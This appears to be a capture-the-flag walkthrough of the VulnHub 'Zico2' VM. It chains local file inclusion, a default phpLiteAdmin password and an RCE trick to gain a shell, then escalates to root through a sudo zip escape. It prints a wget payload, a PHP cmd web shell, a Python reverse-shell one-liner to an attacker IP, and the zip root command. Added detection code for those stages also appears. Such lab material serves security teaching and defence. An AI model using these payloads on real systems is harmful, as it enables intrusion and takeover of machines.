Capture the flag (CTF)

Zico 2: 1 CTF Walkthrough

March 1, 2018 by LetsPen Test

In this article, we will learn to solve another Capture the Flag (CTF) challenge posted on VulnHub by Rafael. As you may know from previous articles, Vulnhub.com is a platform that provides vulnerable applications/machines for practical, hands-on experience in penetration testing.

You can check previous articles for more related CTF challenges. The VM exploited in this article is named "Zico2" on the VulnHub website. The link to download the VM and run it in a VirtualBox is as follows:

https://download.vulnhub.com/zico/zico2.ova

The torrent download URL is also available for this VM, which is given in the reference section of this article. For those who are unaware of the site, VulnHub is a well-known security research website that provides users with a method to learn and practice their hacking skills through a series of challenges in a safe and legal environment.

The objective of this challenge is to gain root access and read the flag file. It is important to note that this VM will work only on VirtualBox.


Step 1

To get started, the first step is always to find out what ports and services are available on the target machine. The Nmap full port scan is used for this specific purpose. This is illustrated in the screenshot below:

The above screenshot demonstrates that 3 ports are listed as OPEN by the Nmap scan.

Step 2

As port 80 is open, I opened the target's IP address in a web browser, and a website became available. You can see it in the following screenshot:

Next, I started looking for vulnerabilities in this application. While exploring, I found an interesting parameter that takes the name of an HTML file as input and renders that file in the web browser. As a result, I started testing this parameter for various vulnerabilities and identified that it is vulnerable to Local File Inclusion (LFI). I extracted the password file from the target machine through this parameter. It can be seen in the screenshot below:

After analyzing the contents of this file, I could see that there are some users on the target machine which have bash (shell) access. Because of this, I tried to log in as one of these users by using various default passwords. However, this technique did not work.

Next, I decided to run the 'Dirb' tool to find any other entry points on the target system. The output of Dirb can be seen in the following screenshot.

Through the output of Dirb, more entry points were discovered. I started with dbadmin and opened the "/dbadmin/" directory in the web browser.

The directory had directory listing enabled and contained a single test file. Clicking on it opened the 'PhpLiteAdmin' login page in the web browser. To log in, only a password was required. It can be seen in the following screenshot:

The application appeared to be an outdated version. I tried the default password admin, and it was correct, so I could successfully log in to the database. To search for known exploits on Google, "phpliteadmin" was given as the search string. The first result shows that this version is vulnerable to remote code execution. This is demonstrated in the screenshot below:

I read this on the Exploit-DB website. It is more of a manual process than an automated script. So I followed it step by step as given in the exploit. First, I created a database with a ".php" extension. It can be seen in the following screenshot:

As demonstrated in the above screenshot, the database created is named "hehe.php." The full path of the database file can be seen in the same window.

As per the exploit process, I created a new table with one field and clicked on "Go."

After that, the application redirected to another page, which asked for the field name and a default value. So, I entered "Any Name" in the first field and set its type to integer. The PHP code was entered as the default value. This process is demonstrated in the following screenshot:

Next, I clicked on "Create," and it created a database table with the given details, as illustrated below:

I had already identified the Local File Inclusion (LFI) vulnerability in the application in the steps above. Next, the database file created with the ".php" extension was included through the vulnerable parameter, as demonstrated below:

As can be seen in the above screenshot, the code was successfully executed on the target system, and the "phpMyAdmin" page is shown in the web browser. This means that whatever PHP code is entered as the default value of the table field is written into the database file and gets executed by the target system when that file is included. Next, a PHP code snippet was written that runs our commands on the target system, as seen in the screenshot below:

<?php
// Change to /tmp and download the 'hehe' file from the host machine
system("cd /tmp; wget 192.168.100.105/hehe;");
?>

This code was added as a table in the database, as can be seen below:

Before executing the code through the web browser, it is important to understand how it works. First, it changes the current directory to "/tmp/". Second, it downloads the "hehe" file from the host machine into the /tmp/ directory on the target machine by using the "wget" utility. The "hehe" file itself contains the following PHP web shell, which runs whatever command is passed in the "cmd" GET parameter:

<?php
// Execute the command supplied in the 'cmd' query parameter
system($_GET['cmd']);
?>

This code was then executed, and the web browser output can be seen in the following screenshot:

As this produces no output in the web browser, it was assumed that the file had been downloaded into the "/tmp/" directory. The "/tmp/hehe" file was then included through the same file inclusion vulnerability, and various commands were executed on the target system by passing them in the "cmd" parameter, as can be seen below:

As can be seen in the screenshot above, the 'ls' command has been successfully executed. It means that we can run arbitrary commands on the target machine. So, let us run a command that gives us the target machine's command shell. This can be specified as follows:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.61",3434));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

The above command makes the target machine connect back to the listener at 192.168.1.61 on port 3434 and attach an interactive shell to that connection.

The above screenshot demonstrates that we have successfully received a reverse connection from the target machine. After that, another command was executed to upgrade this limited shell to a more stable (TTY) shell. This can be seen in the screenshot below:

Command Used: python -c 'import pty; pty.spawn("/bin/sh")'

The first target has been completed: limited shell access on the target machine has been achieved. However, the objective of the CTF challenge is to gain root access to the VM.
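A defender-side view of the web stage described above (LFI, inclusion of the planted .php database file, then commands via the "cmd" parameter), added here as an example and not part of the original walkthrough. It assumes the vulnerable parameter is named "page" and that phpLiteAdmin lives under /dbadmin/; the log lines and the database path are constructed.

```python
import re
from urllib.parse import parse_qs, urlparse

# Constructed sample lines (Apache-style, trimmed); the database path and
# the 'page' parameter name are assumptions, not taken from the article.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Mar/2018:10:00:01 +0000] "GET /view.php?page=tools.html HTTP/1.1" 200 512
10.0.0.5 - - [01/Mar/2018:10:00:07 +0000] "GET /view.php?page=../../../../etc/passwd HTTP/1.1" 200 1337
10.0.0.5 - - [01/Mar/2018:10:02:15 +0000] "GET /dbadmin/test_db.php HTTP/1.1" 200 4021
10.0.0.5 - - [01/Mar/2018:10:05:40 +0000] "GET /view.php?page=../../../../usr/databases/hehe.php HTTP/1.1" 200 88
10.0.0.5 - - [01/Mar/2018:10:06:02 +0000] "GET /view.php?page=../../../../tmp/hehe&cmd=ls HTTP/1.1" 200 201
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) [^"]*"')

def classify(path, query):
    """Tag one request with the stages of the chain it matches (fixed order)."""
    params = {k: v[0] for k, v in parse_qs(query).items()}
    page = params.get("page", "")
    tags = []
    if path.startswith("/dbadmin/"):
        tags.append("exposed_dbadmin")   # phpLiteAdmin reachable from the outside
    if "../" in page or page.startswith("/etc/"):
        tags.append("lfi_traversal")     # path traversal through the include parameter
    if "../" in page and page.endswith(".php"):
        tags.append("lfi_php_include")   # a planted .php file (the SQLite DB) being included
    if "cmd" in params:
        tags.append("webshell_cmd")      # command handed to system($_GET['cmd'])
    return tags

def scan(log_text):
    """Return {client_ip: set of tags} over all parsable lines."""
    seen = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlparse(m.group("url"))
        tags = classify(url.path, url.query)
        if tags:
            seen.setdefault(m.group("ip"), set()).update(tags)
    return seen

def chain_complete(tags):
    """True when one client shows traversal, PHP-file inclusion and cmd= use."""
    return {"lfi_traversal", "lfi_php_include", "webshell_cmd"} <= set(tags)
```

A single client hitting all three stages is the signal worth alerting on; the fix on the application side is to resolve the "page" value against an allowlist of files instead of passing it to include().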


I further explored the VM for any other entry points to accomplish this task. While doing so, I discovered the database credentials in the WordPress configuration file, which can be seen in the below screenshot:

The database username and password are highlighted in red in the screenshot above. I tried the same database password for the user named "ZICO." The output can be seen in the below screenshot:

As can be seen, I have successfully logged in as "ZICO." However, it is still not a root user on the system. So, I started exploring other entry points to discover the root access.

After some time, I found an error message that listed various commands that could be run on the target machine as the root user without actually knowing the root password. This is illustrated in the following screenshot:

As seen in the above screenshot, two package commands can be run as the root user without the need for the actual root password. Thus, I used one of these permitted commands, zip, to obtain root access on the target system. It can be seen in the screenshot below:

Command Used (zip's -T option tests the created archive, and --unzip-command specifies the program used for that test, so under sudo the test step runs /bin/bash as root):

sudo -u root /usr/bin/zip ttt.zip tt.php -T --unzip-command="sh -c /bin/bash"

Finally, root access to the target system has been achieved. I then changed the current directory to the root directory and read the flag file, as demonstrated in the screenshot below:
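A defender-side check for the sudo zip escalation above, added here as an example and not part of the original article: it parses standard sudo syslog entries (sample lines constructed; the benign first entry and the hostname are assumptions) and flags zip run as root with a custom unzip command.

```python
import re

# Constructed sample lines in the standard sudo syslog format. The first is
# a benign archive job; the second mirrors the command used in the walkthrough.
SAMPLE_AUTH = """\
Mar  1 11:02:10 zico sudo:     zico : TTY=pts/0 ; PWD=/home/zico ; USER=root ; COMMAND=/usr/bin/zip backup.zip notes.txt
Mar  1 11:04:31 zico sudo:     zico : TTY=pts/0 ; PWD=/home/zico ; USER=root ; COMMAND=/usr/bin/zip ttt.zip tt.php -T --unzip-command=sh -c /bin/bash
"""

SUDO_RE = re.compile(r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$")

def parse_sudo(line):
    """Return {'user', 'target', 'cmd'} for a sudo log line, else None."""
    m = SUDO_RE.search(line)
    return m.groupdict() if m else None

def zip_shell_escape(cmd):
    """True when zip is invoked with a custom unzip command.

    -T tests the archive after creation; --unzip-command (short form -TT)
    names the program used for that test, so under sudo that program runs
    as the target user. Any use of it in a root-level sudo run is suspect.
    """
    argv = cmd.split()
    if not argv or argv[0].rsplit("/", 1)[-1] != "zip":
        return False
    return any(a == "-TT" or a.startswith("--unzip-command") for a in argv[1:])

def audit(log_text):
    """Return [(user, cmd)] for root-targeted sudo runs of zip with a custom unzip command."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_sudo(line)
        if rec and rec["target"] == "root" and zip_shell_escape(rec["cmd"]):
            hits.append((rec["user"], rec["cmd"]))
    return hits
```

Because --unzip-command lets zip run an arbitrary program, a sudo rule that permits zip is equivalent to granting a root shell; the fix is to remove that rule (or require a password) rather than to tune the detection.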

So, we finally got the flag. This completes the challenge. Stay tuned for more challenges in future articles.


References
